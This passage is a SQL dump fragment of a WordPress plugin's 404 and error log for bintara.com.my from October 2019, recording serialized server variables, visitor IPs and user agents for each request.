gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570965408.6841449737548828125000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570965408.6841449737548828125000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570965408.6841449737548828125000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"33912\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570965408.6841449737548828125000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaMHoAkNfFWjTvvon1oixAAAAUc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaMHoAkNfFWjTvvon1oixAAAAUc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"33912\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMHoAkNfFWjTvvon1oixAAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570966322.2913\";s:12:\"REQUEST_TIME\";s:10:\"1570966322\";}}','notice','2019-10-13 11:32:19','2019-10-13 11:32:03',35056072,35309848,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570965408.6841449737548828125000',1,0,'103.6.198.69'),(27977,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.7 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.98.141.222\";s:11:\"REMOTE_PORT\";s:5:\"58897\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaN9WE-otKDtdVthBikvTQAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570995544.4309\";s:12:\"REQUEST_TIME\";s:10:\"1570995544\";}}','notice','2019-10-13 19:39:07','2019-10-13 19:39:04',35423648,37234744,'https://bintara.com.my/?page_id=18',1,0,'46.98.141.222'),(27975,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"51.143.1.77\";s:11:\"REMOTE_PORT\";s:5:\"41388\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaNE0kjjse2sGKWHNCvCOwAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570981074.4422\";s:12:\"REQUEST_TIME\";s:10:\"1570981074\";}}','notice','2019-10-13 15:37:58','2019-10-13 15:37:55',35462544,37275096,'https://bintara.com.my/?page_id=18',1,0,'51.143.1.77'),(27976,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:54.0) Gecko/20100101 Firefox/54.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.133.165\";s:11:\"REMOTE_PORT\";s:5:\"61492\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaN3KU-otKDtdVthBiktKgAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570993961.6377\";s:12:\"REQUEST_TIME\";s:10:\"1570993961\";}}','notice','2019-10-13 19:12:44','2019-10-13 19:12:42',35463944,37276992,'https://bintara.com.my/?page_id=18',1,0,'108.161.133.165'),(27974,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/content-post.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"76-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"76-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"76-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/content-post.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/content-post.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaMkQ0jjse2sGKWHNCus@AAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/content-post.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/content-post.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaMkQ0jjse2sGKWHNCus@AAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"50.31.134.21\";s:11:\"REMOTE_PORT\";s:5:\"55394\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/content-post.php\";s:10:\"SCRIPT_URL\";s:17:\"/content-post.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMkQ0jjse2sGKWHNCus@AAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570972739.9384\";s:12:\"REQUEST_TIME\";s:10:\"1570972739\";}}','notice','2019-10-13 13:19:04','2019-10-13 13:19:00',35490536,37292536,'https://bintara.com.my/content-post.php',1,0,'50.31.134.21'),(27972,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"49676\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMXmA7WMZbw-is73DnaZgAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570969497.344\";s:12:\"REQUEST_TIME\";s:10:\"1570969497\";}}','notice','2019-10-13 12:25:03','2019-10-13 12:24:57',35428040,37228224,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27973,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"50503\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaMXrgkNfFWjTvvon1olxgAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570969518.7338\";s:12:\"REQUEST_TIME\";s:10:\"1570969518\";}}','notice','2019-10-13 12:25:22','2019-10-13 12:25:19',35027760,36835200,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(29039,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"72.11.148.222\";s:11:\"REMOTE_PORT\";s:5:\"36479\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJ7bp6EeNO1SEOj8Ryc0AAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571978095.1024\";s:12:\"REQUEST_TIME\";s:10:\"1571978095\";}}','notice','2019-10-25 04:34:57','2019-10-25 04:34:55',34534336,36352128,'https://bintara.com.my/?page_id=18/contact.php',1,0,'72.11.148.222'),(29038,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; 